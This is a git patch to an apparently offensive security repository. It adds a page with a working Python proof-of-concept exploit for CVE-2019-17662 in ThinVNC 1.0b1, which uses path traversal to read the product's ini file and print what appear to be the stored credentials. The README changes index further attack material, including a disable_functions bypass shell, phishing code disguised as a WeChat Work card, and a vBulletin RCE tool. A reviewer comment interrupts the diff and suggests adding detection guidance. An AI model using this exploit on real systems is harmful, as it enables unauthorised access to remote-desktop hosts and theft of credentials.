From fadc625bad4cf61ddad76e184ff68d040e4e11b6 Mon Sep 17 00:00:00 2001
From: mr-xn
Date: Thu, 17 Oct 2019 21:52:06 +0800
Subject: [PATCH] add CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass
---
 ...2-ThinVNC 1.0b1 - Authentication Bypass.md | 51 +++++++++++++++++++
 README.md | 2 +
 2 files changed, 53 insertions(+)
 create mode 100644 CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md
diff --git a/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md b/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md
new file mode 100644
index 0000000..56286de
--- /dev/null
+++ b/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md
@@ -0,0 +1,51 @@
+## ThinVNC 1.0b1 - Authentication Bypass
+
+## 简介
+
+ThinVNC是一款基于HTML5和AJAX的远程桌面实现
+
+## POC
+
+```python
+# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
+# Date: 2019-10-17
+# Exploit Author: Nikhith Tumamlapalli
+# Contributor WarMarX
+# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
+# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
+# Version: 1.0b1
+# Tested on: Windows All Platforms
+# CVE : CVE-2019-17662
+
+# Description:
+# Authentication Bypass via Arbitrary File Read
+
+#!/usr/bin/python3
+
+import sys
+import os
+import requests
+
+def exploit(host,port):
+ url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
+ r = requests.get(url)
+ body = r.text
+ print(body.splitlines()[2])
+ print(body.splitlines()[3])
+
+
+
+def main():
+ if(len(sys.argv)!=3):
+ print("Usage:\n{} \n".format(sys.argv[0]))
+ print("Example:\n{} 192.168.0.10 5888")
+ else:
+ port = sys.argv[2]
+ host = sys.argv[1]
+ exploit(host,port)
+
+if __name__ == '__main__':
+ main()
+
+```
+
diff --git a/README.md b/README.md
index b35951d..21b74aa 100644
--- a/README.md
+++ b/README.md
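Review bot: The new write-up ends at the closing fence of the PoC and never tells a reader what the flaw is or what a defender should do about it; the only explanation is the script's own comment `# Authentication Bypass via Arbitrary File Read`. The request path `/xyz/../../ThinVnc.ini` shows a path traversal against the product's web listener, and the two lines the script prints are presumably the stored credentials, so that should be stated in prose under the introduction. A short section after the fence would cover the defensive side, for example `## Detection and mitigation`, `- Search proxy or network logs for requests whose path contains ../ and ends in ThinVnc.ini` and `- Keep the ThinVNC port off untrusted networks and change the credentials held in ThinVnc.ini if such a request is found`. The page names no fixed release, so the section should say that rather than imply an upgrade path exists.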
@@ -74,6 +74,7 @@
 - [Joomla-3.4.6-RCE](./Joomla-3.4.6-RCE.md)
 - [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md)
 - [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./构建ASMX绕过限制WAF达到命令执行.md)
+- [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./CVE-2019-17662-ThinVNC%201.0b1 - Authentication%20Bypass.md)
 ## 提权辅助相关
@@ -97,6 +98,7 @@
 - [python2的socks代理](./tools/s5.py)
 - [dede_burp_admin_path-dedecms后台路径爆破(Windows环境)](./tools/dede_burp_admin_path.md)
 - [PHP 7.1-7.3 disable_functions bypass](./tools/PHP%207.1-7.3%20disable_functions%20bypass.md)
+- [一个各种方式突破Disable_functions达到命令执行的shell](https://github.com/l3m0n/Bypass_Disable_functions_Shell)
 - [cmd下查询3389远程桌面端口](./tools/cmd下查询3389远程桌面端口.md)
 - [伪装成企业微信名片的钓鱼代码](./tools/伪装成企业微信名片的钓鱼代码.txt)
 - [vbulletin5-rce利用工具(批量检测/getshell)](https://github.com/theLSA/vbulletin5-rce)/[保存了一份源码:vbulletin5-rce.py](./tools/vbulletin5-rce.py)